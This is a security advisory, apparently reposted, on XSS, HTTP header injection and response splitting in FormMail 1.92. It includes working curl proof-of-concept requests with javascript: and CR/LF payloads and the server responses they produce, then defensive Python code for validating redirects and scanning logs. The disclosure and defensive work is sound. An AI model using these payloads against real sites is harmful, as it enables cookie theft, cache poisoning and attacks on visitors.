FormMail: multiple vulnerabilities

2010-1-30 22:11 | Posted by: admin | Views: 23 | Comments: 0 | Original author: 韩菱纱


* FormMail version 1.92

A) Prelude to the vulnerabilities

What follows is the code used to validate the user input.

Line 283: $safeConfig array definition.

    foreach $field (keys %Config) {
        $safeConfig{$field} = &clean_html($Config{$field});
    }

Line 518: definition of the clean_html function, used to generate the "$safeConfig" array from "$Config".

    # This function will convert <, >, & and " to their HTML equivalents.
    sub clean_html {
        local $value = $_[0];
        $value =~ s/\&/\&amp;/g;
        $value =~ s/</\&lt;/g;
        $value =~ s/>/\&gt;/g;
        $value =~ s/"/\&quot;/g;
        return $value;
    }

This function is not always applied to the user input, and even where it is, HTML entity encoding does not protect against every attack vector (for example URI-based or DOM XSS payloads keep working when encoded, and CR/LF characters are left untouched). This is why several distinct vulnerabilities exist.
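To make that gap concrete, here is an added example (not FormMail's code and not part of the advisory): a Python port of clean_html, placed beside a hypothetical validate_redirect_url check of the kind a maintainer would apply to any value that ends up in a Location header or an href attribute. The function names, the allowlisted host www.example.com and the sample inputs are assumptions for this demo.

```python
import re
from urllib.parse import urlsplit

# Port of FormMail 1.92's clean_html (quoted in the advisory) so its behaviour
# can be checked directly: it rewrites only &, <, > and ".
def clean_html(value: str) -> str:
    value = value.replace("&", "&amp;")
    value = value.replace("<", "&lt;")
    value = value.replace(">", "&gt;")
    value = value.replace('"', "&quot;")
    return value

# Hypothetical allowlist of redirect targets; a real deployment would fill
# this from its own configuration (constructed value for the demo).
ALLOWED_HOSTS = {"www.example.com"}

def validate_redirect_url(value: str, allowed_hosts=ALLOWED_HOSTS):
    """Return (ok, reason) for a value destined for a Location header or href.

    The check runs on the URL-decoded value, i.e. what the CGI script sees
    after %0D%0A has already become a real CR LF pair.
    """
    # Control characters are what turn one header value into extra headers
    # or a second response; test for them before parsing, because
    # urllib.parse.urlsplit silently strips \r, \n and \t from its input.
    if re.search(r"[\x00-\x1f\x7f]", value):
        return False, "control character in URL"
    parts = urlsplit(value)
    # Only absolute http(s) URLs: this excludes javascript:, data: and the
    # scheme-relative //host form in one step.
    if parts.scheme.lower() not in ("http", "https"):
        return False, "scheme not allowed: %s" % (parts.scheme or "(none)")
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return False, "host not allowlisted: %s" % (host or "(none)")
    return True, "ok"

def safe_location_header(value: str, allowed_hosts=ALLOWED_HOSTS) -> bytes:
    """Emit the Location header only for a validated URL; refuse otherwise."""
    ok, reason = validate_redirect_url(value, allowed_hosts)
    if not ok:
        raise ValueError("refusing redirect: " + reason)
    return b"Location: " + value.encode("ascii") + b"\r\n"

if __name__ == "__main__":
    # Inputs modelled on the advisory's requests plus one legitimate value.
    samples = [
        "javascript:alert('USH');",
        "http://www.example.com\r\nSet-Cookie:auth=USH",
        "//www.example.com/x",
        "http://www.example.com/thanks.html",
    ]
    for s in samples:
        print(repr(s))
        print("  clean_html leaves it as:", repr(clean_html(s)))
        print("  validate_redirect_url:  ", validate_redirect_url(s))
```

Running it shows that clean_html returns the first three inputs unchanged, because none of them contains one of the four characters it rewrites; the allowlist check is what rejects them. The host allowlist is the part most sites will want to adapt; keeping the scheme and control-character checks unchanged is what closes the header injection and the javascript: reflection.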

B) Cross Site Scripting vulnerability

Line 293: the "redirect" variable is used to write the Location header value. Its value is not filtered for CR/LF, so it is possible to perform both an HTTP Header Injection and an HTTP Response Splitting attack.

Since Header Injection is one of the most versatile attack vectors, we could use it ("downgrade it") to perform a Cross Site Scripting attack, but that would not represent a different vulnerability.

In this case we are already inside a "Location" response header, and it is possible to perform an XSS without splitting the response, using the standard Apache page for the 302 Found HTTP status.

    # If redirect option is used, print the redirectional location header.
    if ($Config{'redirect'}) {
        print "Location: $safeConfig{'redirect'}\n\n";
    }

XSS vulnerability example:

http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=javascript:alert(%27USH%27);

Response:

$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=javascript:alert(%27USH%27);"

HTTP/1.1 302 Found
Date: Sat, 11 Apr 2009 14:12:11 GMT
Server: Apache
Location: javascript:alert('USH');
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="javascript:alert('USH');">here</a>.</p>
<hr>
<address>Apache Server at 127.0.0.1 Port 80</address>
</body></html>

Obviously the XSS is not automatic, since browsers don't follow the "javascript:" URI handler in the "Location" header.

A second XSS vulnerability, not based on HTTP tricks, exists: in the following code the "$return_link" variable is reflected (printed) in the page body without any validation.

Line 371: the "$return_link" variable is printed in the page body without any validation.

    # Check for a Return Link and print one if found.
    if ($Config{'return_link_url'} && $Config{'return_link_title'}) {
        print "<ul>\n";
        print "<li><a href=\"$safeConfig{'return_link_url'}\">$safeConfig{'return_link_title'}</a>\n";
        print "</ul>\n";
    }

The vulnerability can be triggered with the following request:

$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH"

This XSS is not automatic.

C) HTTP Response Header Injection

An HTTP Response Header Injection vulnerability exists; the following request triggers it:

$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;"

It can be verified with the obvious "javascript:alert(document.cookie)".

D) HTTP Response Splitting

Thanks to the full exploitability of the Header Injection vulnerability, HTTP Response Splitting can be performed.

The following request is an example of the attack:

http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=http://www.ush.it%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.ush.it

$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.ush.it"

HTTP/1.1 302 Found
Date: Sun, 12 Apr 2009 23:01:18 GMT
Server: Apache
Content-Length: 0
Location:
Transfer-Encoding: chunked
Content-Type: text/plain

HTTP/1.1 200 OK
Content-Type: text/plain
http://www.ush.it

HTTP Response Splitting can be used to trigger a number of different vectors, ranging from automatic Reflected XSS to Browser and Proxy Cache Poisoning.
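For operators who cannot patch a deployed FormMail.pl immediately, here is an added example (not part of the advisory) that scans Apache access-log lines for the request shapes described in sections B, C and D: control characters such as CR/LF in any FormMail.pl parameter, and script URI schemes in the redirect or return_link_url parameters. The log lines, the address 10.0.0.5 and the scan_log/check_param names are constructed for this demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log style lines for this demo (not from a real
# server). Three reproduce the advisory's request shapes, two are benign.
SAMPLE_LOG = """\
127.0.0.1 - - [11/Apr/2009:14:12:11 +0000] "GET /FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=javascript:alert(%27USH%27); HTTP/1.1" 302 267
127.0.0.1 - - [11/Apr/2009:14:15:02 +0000] "GET /FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH HTTP/1.1" 302 0
127.0.0.1 - - [11/Apr/2009:14:16:40 +0000] "GET /FormMail.pl?recipient=evilaliv3@ush.it&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH HTTP/1.1" 200 512
10.0.0.5 - - [11/Apr/2009:14:20:00 +0000] "GET /FormMail.pl?recipient=webmaster@example.com&subject=Contact&redirect=http://www.example.com/thanks.html HTTP/1.1" 302 0
10.0.0.5 - - [11/Apr/2009:14:21:13 +0000] "GET /index.html HTTP/1.1" 200 1234
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Parameters FormMail writes into a Location header or an href attribute.
URL_PARAMS = {"redirect", "return_link_url"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")
# Any C0 control or DEL in a decoded value; covers %0D%0A and the %0F seen
# in the response-splitting request.
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")

def parse_query(target):
    """Split a request target into its path and a list of decoded (name, value)."""
    path, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return path, params

def check_param(name, value):
    """Return a reason string if the decoded parameter looks like an attack, else None."""
    if CONTROL_RE.search(value):
        return "control character (CR/LF) in parameter: header injection / response splitting"
    if name in URL_PARAMS and value.lstrip().lower().startswith(SCRIPT_SCHEMES):
        return "script URI scheme in URL parameter: reflected XSS"
    return None

def scan_log(text):
    """Return one finding per suspicious FormMail.pl parameter in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, params = parse_query(m["target"])
        if not path.lower().endswith("/formmail.pl"):
            continue
        for name, value in params:
            reason = check_param(name, value)
            if reason:
                findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                                 "param": name, "reason": reason})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%(ip)s %(ts)s %(status)s %(param)s: %(reason)s" % f)
```

The scan decodes each parameter before inspecting it, because the raw log line only ever shows the percent-encoded form; matching on the literal string "%0D%0A" would miss mixed-case encodings such as the "%0D%0a" in the header-injection request. A 302 with a decoded CR/LF in redirect is the signature of the splitting attempt; the same check applied in a WAF rule or at the reverse proxy blocks it before FormMail.pl sees it.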
Disclosure Timeline:
20070501 Bug discovered
20070531 Initial vendor contact -- No response
20090505 Second vendor contact -- No response
20090511 Advisory Release